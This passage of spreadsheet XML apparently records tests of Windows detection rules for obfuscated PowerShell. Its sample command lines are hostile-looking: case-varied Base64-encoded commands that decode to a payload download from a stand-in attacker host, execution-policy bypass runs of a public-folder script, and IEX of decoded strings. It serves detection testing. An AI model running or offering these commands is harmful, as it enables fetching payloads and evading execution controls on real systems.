      <c r="F814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H814" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I814" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J814" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K814" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1" s="42">
      <c r="A815" s="43" t="n"/>
      <c r="B815" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C815" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D815" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E815" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcOdEdComMAND SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H815" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I815" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J815" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K815" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1" s="42">
      <c r="A816" s="43" t="n"/>
      <c r="B816" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C816" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D816" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E816" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H816" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I816" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J816" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K816" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="817" ht="15.75" customHeight="1" s="42">
      <c r="A817" s="43" t="n"/>
      <c r="B817" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C817" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D817" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E817" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDeDCoMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F817" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G817" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H817" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I817" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J817" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K817" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="818" ht="15.75" customHeight="1" s="42">
      <c r="A818" s="43" t="n"/>
      <c r="B818" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C818" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D818" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E818" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENCoDEdcoMMaNd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F818" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G818" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H818" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I818" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J818" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K818" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="819" ht="15.75" customHeight="1" s="42">
      <c r="A819" s="43" t="n"/>
      <c r="B819" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C819" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D819" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E819" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcODeDcOMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F819" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G819" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H819" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I819" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J819" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K819" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="15.75" customHeight="1" s="42">
      <c r="A820" s="43" t="n"/>
      <c r="B820" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C820" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D820" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E820" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encODEDCOMMand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F820" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G820" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H820" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I820" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J820" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K820" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="15.75" customHeight="1" s="42">
      <c r="A821" s="43" t="n"/>
      <c r="B821" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C821" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D821" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E821" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F821" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G821" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H821" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I821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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K821" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="15.75" customHeight="1" s="42">
      <c r="A822" s="43" t="n"/>
      <c r="B822" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C822" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D822" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E822" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtioNpoLicy Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F822" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G822" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H822" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I822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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K822" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="15.75" customHeight="1" s="42">
      <c r="A823" s="43" t="n"/>
      <c r="B823" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C823" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D823" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E823" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutIOnPOLIcY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F823" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G823" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H823" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I823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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K823" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="824" ht="15.75" customHeight="1" s="42">
      <c r="A824" s="43" t="n"/>
      <c r="B824" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C824" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D824" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E824" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FILE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F824" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G824" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H824" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I824" s="36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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K824" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="15.75" customHeight="1" s="42">
      <c r="A825" s="43" t="n"/>
      <c r="B825" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C825" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D825" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E825" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutionPOliCY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F825" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G825" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H825" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I825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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K825" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="15.75" customHeight="1" s="42">
      <c r="A826" s="43" t="n"/>
      <c r="B826" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C826" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D826" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E826" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F826" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G826" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H826" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I826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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K826" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="15.75" customHeight="1" s="42">
      <c r="A827" s="43" t="n"/>
      <c r="B827" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C827" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D827" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E827" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F827" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G827" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H827" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I827" s="36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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K827" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="15.75" customHeight="1" s="42">
      <c r="A828" s="43" t="n"/>
      <c r="B828" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C828" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D828" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E828" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F828" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G828" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H828" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I828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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K828" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="15.75" customHeight="1" s="42">
      <c r="A829" s="43" t="n"/>
      <c r="B829" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C829" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D829" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E829" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F829" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G829" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H829" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I829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29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K829" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="15.75" customHeight="1" s="42">
      <c r="A830" s="43" t="n"/>
      <c r="B830" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C830" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D830" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E830" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -fIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F830" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G830" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H830" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I830" s="36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30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K830" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="15.75" customHeight="1" s="42">
      <c r="A831" s="43" t="n"/>
      <c r="B831" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C831" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D831" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E831" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F831" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G831" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H831" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I831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31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K831" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="15.75" customHeight="1" s="42">
      <c r="A832" s="43" t="n"/>
      <c r="B832" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C832" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D832" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E832" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXecutIONPOLicy Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H832" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I832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832" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K832" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="15.75" customHeight="1" s="42">
      <c r="A833" s="43" t="n"/>
      <c r="B833" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C833" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D833" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E833" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I833" s="43" t="n"/>
      <c r="J833" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K833" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="834" ht="15.75" customHeight="1" s="42">
      <c r="A834" s="43" t="n"/>
      <c r="B834" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C834" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D834" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E834" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I834" s="43" t="n"/>
      <c r="J834" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K834" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="835" ht="15.75" customHeight="1" s="42">
      <c r="A835" s="43" t="n"/>
      <c r="B835" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C835" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D835" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E835" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I835" s="36" t="n"/>
      <c r="J835" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K835" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="836" ht="15.75" customHeight="1" s="42">
      <c r="A836" s="43" t="n"/>
      <c r="B836" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C836" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D836" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E836" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F836" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G836" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H836" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I836" s="36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36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K836" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="837" ht="15.75" customHeight="1" s="42">
      <c r="A837" s="43" t="n"/>
      <c r="B837" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C837" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D837" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E837" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F837" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G837" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H837" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I837" s="36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37" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K837" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="838" ht="15.75" customHeight="1" s="42">
      <c r="A838" s="43" t="n"/>
      <c r="B838" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C838" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D838" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E838" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaND "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F838" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G838" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H838" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I838" s="36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38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K838" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="839" ht="15.75" customHeight="1" s="42">
      <c r="A839" s="43" t="n"/>
      <c r="B839" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C839" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D839" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E839" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F839" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G839" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H839" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I839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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K839" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="15.75" customHeight="1" s="42">
      <c r="A840" s="43" t="n"/>
      <c r="B840" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C840" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D840" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E840" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H840" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I840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40" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K840" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="841" ht="15.75" customHeight="1" s="42">
      <c r="A841" s="43" t="n"/>
      <c r="B841" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C841" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
